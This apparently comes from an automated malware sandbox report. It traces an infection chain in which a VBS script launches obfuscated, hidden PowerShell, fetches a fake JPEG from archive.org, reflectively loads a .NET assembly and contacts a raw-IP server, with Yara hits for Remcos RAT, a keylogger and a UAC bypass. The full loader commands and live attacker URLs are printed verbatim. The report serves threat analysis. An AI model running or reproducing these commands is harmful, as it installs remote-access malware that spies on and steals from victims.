                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:16:29:32
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
                                                                              Imagebase:0x300000
                                                                              File size:141'824 bytes
                                                                              MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:16:29:32
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?Ec? ? ? ? ?RwBS? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?w? ? ? ? ?DY? ? ? ? ?Lw? ? ? ? ?4? ? ? ? ?DI? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DE? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dg? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                              Imagebase:0x2f0000
                                                                              File size:427'008 bytes
                                                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:16:29:34
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                                              Imagebase:0x2f0000
                                                                              File size:427'008 bytes
                                                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:16:29:39
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:16:29:39
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:15
                                                                              Start time:16:29:42
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:16:29:42
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:16:29:42
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Call Graph

                                                                              • Entrypoint
                                                                              • Decryption Function
                                                                              • Executed
                                                                              • Not Executed
                                                                              • Show Help
                                                                              callgraph 1 Error: Graph is empty

                                                                              Module: Sheet1

                                                                              Declaration
                                                                              LineContent
                                                                              1

                                                                              Attribute VB_Name = "Sheet1"

                                                                              2

                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                              3

                                                                              Attribute VB_GlobalNameSpace = False

                                                                              4

                                                                              Attribute VB_Creatable = False

                                                                              5

                                                                              Attribute VB_PredeclaredId = True

                                                                              6

                                                                              Attribute VB_Exposed = True

                                                                              7

                                                                              Attribute VB_TemplateDerived = False

                                                                              8

                                                                              Attribute VB_Customizable = True

                                                                              Module: Sheet2

                                                                              Declaration
                                                                              LineContent
                                                                              1

                                                                              Attribute VB_Name = "Sheet2"

                                                                              2

                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                              3

                                                                              Attribute VB_GlobalNameSpace = False

                                                                              4

                                                                              Attribute VB_Creatable = False

                                                                              5

                                                                              Attribute VB_PredeclaredId = True

                                                                              6

                                                                              Attribute VB_Exposed = True

                                                                              7

                                                                              Attribute VB_TemplateDerived = False

                                                                              8

                                                                              Attribute VB_Customizable = True

                                                                              Module: Sheet3

                                                                              Declaration
                                                                              LineContent
                                                                              1

                                                                              Attribute VB_Name = "Sheet3"

                                                                              2

                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                              3

                                                                              Attribute VB_GlobalNameSpace = False

                                                                              4

                                                                              Attribute VB_Creatable = False

                                                                              5

                                                                              Attribute VB_PredeclaredId = True

                                                                              6

                                                                              Attribute VB_Exposed = True

                                                                              7

                                                                              Attribute VB_TemplateDerived = False

                                                                              8

                                                                              Attribute VB_Customizable = True

                                                                              Module: ThisWorkbook

                                                                              Declaration
                                                                              LineContent
                                                                              1

                                                                              Attribute VB_Name = "ThisWorkbook"

                                                                              2

                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                              3

                                                                              Attribute VB_GlobalNameSpace = False

                                                                              4

                                                                              Attribute VB_Creatable = False

                                                                              5

                                                                              Attribute VB_PredeclaredId = True

                                                                              6

                                                                              Attribute VB_Exposed = True

                                                                              7

                                                                              Attribute VB_TemplateDerived = False

                                                                              8

                                                                              Attribute VB_Customizable = True

                                                                              Reset < >

                                                                                Executed Functions

